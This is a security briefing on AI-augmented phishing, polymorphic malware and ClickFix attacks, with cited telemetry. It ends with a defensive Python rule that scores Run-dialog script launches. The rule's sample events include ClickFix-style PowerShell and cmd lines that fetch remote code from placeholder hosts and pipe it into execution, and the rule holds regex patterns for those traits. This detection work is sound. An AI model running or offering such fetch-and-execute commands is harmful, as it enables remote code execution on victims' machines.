Attackers using AI tactics
Attackers are adopting machine learning to craft far more convincing phishing lures and polymorphic malware that can evade traditional filters—making human clicks more likely and detection harder. The cat‑and‑mouse dynamic means signature‑based tools will miss an increasing share of targeted campaigns. (techtimes.com)
Microsoft’s 2025 Digital Defense Report measured AI‑generated phishing at a 54% click‑through rate versus 12% for non‑AI phishing (4.5× more effective) across Microsoft’s July 2024–June 2025 telemetry. (microsoft.com)
Automated reconnaissance tools and LLMs are being used to scrape public social profiles and generate highly personalized lures that reference real projects, colleagues, or calendar events, according to Microsoft and contemporary reporting. (microsoft.com)
Proof‑of‑concepts and vendor walk‑throughs show LLMs can produce polymorphic malware that rewrites or obfuscates its own code at build time or runtime, creating unique binaries for each victim and complicating signature matching. (cardinalops.com)
Industry analysis and peer‑reviewed research note that legacy signature‑based antivirus and static gateway filters are failing to catch a growing slice of these adaptive threats and recommend behavioral/runtime detection as a necessary complement. (csoonline.com)
ClickFix-style social‑engineering—landing pages that coerce victims into copying and running commands—exploded in 2025, with ESET telemetry reporting a ~517% rise and nearly 8% of blocked attacks in H1 2025, and Microsoft identifying ClickFix as the leading initial‑access technique in its 2025 analysis (about 47% of observed initial access cases). (web-assets.esetstatic.com)
Microsoft’s guidance for mitigating these AI‑augmented campaigns includes hardening device configurations (for example, restricting the Run dialog and limiting script execution), expanding MFA coverage, and applying Zero‑Trust principles while using AI‑powered detection and automated remediation where feasible. (microsoft.com)
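As an added illustration of the behavioral detection recommended above (not code from Microsoft, ESET or the other cited sources), the following Python rule scores process-creation events in which explorer.exe, the parent of Run-dialog launches, starts a script host with ClickFix-style command-line traits. The event layout, indicator list, threshold and sample events are assumptions constructed for this example.

```python
import re

# Script hosts a user can be talked into launching from the Run dialog (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}

# Command-line traits worth scoring once the parent is explorer.exe (assumed heuristics).
INDICATORS = {
    "hidden_window": re.compile(r"-w(in(dowstyle)?)?\s+h(idden)?\b", re.I),
    "encoded_command": re.compile(r"\s-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_fetch": re.compile(r"\b(iwr|irm|invoke-webrequest|curl)\b.*https?://", re.I),
    "pipe_to_eval": re.compile(r"\|\s*(iex|invoke-expression)\b", re.I),
    "fake_verification": re.compile(r"#.*(captcha|verif|not a robot)", re.I),
}

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def score_event(parent_image, image, command_line):
    """Return sorted indicator names for one process-creation event, or [] if out of scope."""
    # Run-dialog launches have explorer.exe as parent; other parents are not this rule's concern.
    if basename(parent_image) != "explorer.exe" or basename(image) not in SCRIPT_HOSTS:
        return []
    return sorted(name for name, rx in INDICATORS.items() if rx.search(command_line))

def triage(events, threshold=2):
    """Return (host, hits) for every event with at least `threshold` indicators."""
    scored = ((host, score_event(p, i, c)) for host, p, i, c in events)
    return [(host, hits) for host, hits in scored if len(hits) >= threshold]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events: (host, parent image, image, command line). All values are placeholders.
EVENTS = [
    ("WS-01", r"C:\Windows\explorer.exe", PS,
     'powershell -w hidden -c "iwr https://example.invalid/a | iex" # I am not a robot - verification ID 1234'),
    ("WS-02", r"C:\Windows\explorer.exe", PS, r"powershell.exe -File C:\Scripts\inventory.ps1"),
    ("WS-03", r"C:\Program Files\Agent\agent.exe", PS,
     'powershell -w hidden -c "irm https://example.invalid/cfg | iex"'),
    ("WS-04", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
     "cmd /c curl https://example.invalid/s.cmd -o s.cmd"),
]

if __name__ == "__main__":
    for host, hits in triage(EVENTS):
        print(host, hits)
```

Because the rule keys on parent process and command-line behavior rather than file hashes, it is unaffected by per-victim binary variation; the threshold trades analyst workload against single-indicator cases such as WS-04.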